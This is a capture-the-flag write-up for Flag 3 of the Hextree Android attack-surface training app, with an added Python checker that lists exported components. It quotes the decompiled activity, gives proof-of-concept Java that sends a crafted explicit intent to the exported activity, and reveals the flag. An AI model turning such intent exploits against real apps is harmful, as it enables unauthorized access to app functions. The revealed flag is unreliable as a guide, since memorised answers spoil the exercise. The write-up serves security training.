Static Analysis

AndroidManifest.xml

Inspecting Flag3Activity in the AndroidManifest.xml file, we see the following:

<activity  
	android:name="io.hextree.attacksurface.activities.Flag3Activity"  
	android:exported="true">

Since exported is set to true, we can call this activity from our exploit APK. Let’s review the code to see how we can get the flag.
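
A static check for the manifest inspection step above, as an added example that is not part of the original write-up or the Hextree app: it lists the components other apps can reach and flags those with no android:permission. The sample manifest is constructed; InternalActivity, GuardedService, LegacyReceiver and the com.example names are hypothetical.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
# Constructed sample: the Flag3Activity entry from the page plus three
# hypothetical components added for contrast.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="io.hextree.attacksurface">
  <application>
    <activity
        android:name="io.hextree.attacksurface.activities.Flag3Activity"
        android:exported="true"/>
    <activity android:name=".InternalActivity" android:exported="false"/>
    <service android:name=".GuardedService" android:exported="true"
        android:permission="com.example.permission.BIND"/>
    <receiver android:name=".LegacyReceiver">
      <intent-filter><action android:name="com.example.action.PING"/></intent-filter>
    </receiver>
  </application>
</manifest>"""


def exported_components(manifest_xml):
    """Return (tag, name, permission) for each component other apps can reach."""
    app = ET.fromstring(manifest_xml).find("application")
    findings = []
    for elem in (app if app is not None else []):
        if elem.tag not in ("activity", "activity-alias", "service", "receiver", "provider"):
            continue
        exported = elem.get(ANDROID_NS + "exported")
        # With no explicit android:exported, an intent-filter exported the
        # component by default in apps targeting releases before Android 12.
        implicit = (exported is None and elem.tag != "provider"
                    and elem.find("intent-filter") is not None)
        if exported == "true" or implicit:
            # A permission set on <application> applies when the component sets none.
            perm = elem.get(ANDROID_NS + "permission") or app.get(ANDROID_NS + "permission")
            findings.append((elem.tag, elem.get(ANDROID_NS + "name"), perm))
    return findings


def unprotected(findings):
    """Keep only exported components that no permission guards."""
    return [(tag, name) for tag, name, perm in findings if perm is None]


if __name__ == "__main__":
    for tag, name in unprotected(exported_components(SAMPLE_MANIFEST)):
        print("exported without permission: <%s> %s" % (tag, name))
```

The script expects a text manifest as decoded by apktool or jadx; the binary AXML inside an APK has to be decoded first.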

Flag3Activity Class

public class Flag3Activity extends AppCompactActivity {  
    public Flag3Activity() {  
        this.name = "Flag 3 - Intent with a data URI";  
        this.flag = "G4yi3uCGLvKhT12+f6RPn1Uc8iMapJnbjGnILAvtdOA=";  
    }  
  
    @Override // io.hextree.attacksurface.AppCompactActivity, androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activity  
    protected void onCreate(Bundle bundle) {  
        super.onCreate(bundle);  
        this.f = new LogHelper(this);  
        Intent intent = getIntent();  
        String action = intent.getAction();  
        if (action == null || !action.equals("io.hextree.action.GIVE_FLAG")) {  
            return;  
        }  
        this.f.addTag(action);  
        Uri data = intent.getData();  
        if (data == null || !data.toString().equals("https://app.hextree.io/map/android")) {  
            return;  
        }  
        this.f.addTag(data);  
        success(this);  
    }  
}

We can see here that if the intent's action is not set to io.hextree.action.GIVE_FLAG, onCreate returns without giving us the flag, so we need to send the intent with this specific action. We also see that the intent's data URI must be exactly https://app.hextree.io/map/android, so that needs to be set as well.

Creating POC

In our APK we add a button that fires an intent with the desired action and data to Flag3Activity:

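// Placed in the PoC activity's onCreate(). Imports needed: android.content.ComponentName,
// android.content.Intent, android.net.Uri, android.util.Log, android.view.View, android.widget.Button.
Button button = findViewById(R.id.button_flag3);
button.setOnClickListener(new View.OnClickListener() {
	@Override
	public void onClick(View v) {
		Log.v("HEXTREE", "Going to flag 3 activity");
		Intent intent = new Intent();
		// Explicit intent: target package and the exported activity's class name
		intent.setComponent(
				new ComponentName("io.hextree.attacksurface", "io.hextree.attacksurface.activities.Flag3Activity"));
		// Action that Flag3Activity.onCreate() compares against
		intent.setAction("io.hextree.action.GIVE_FLAG");
		// Data URI must match the string checked in onCreate() exactly
		intent.setData(Uri.parse("https://app.hextree.io/map/android"));
		startActivity(intent);
	}
});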

Flag

HXT{intent-uri-data-sda982bs}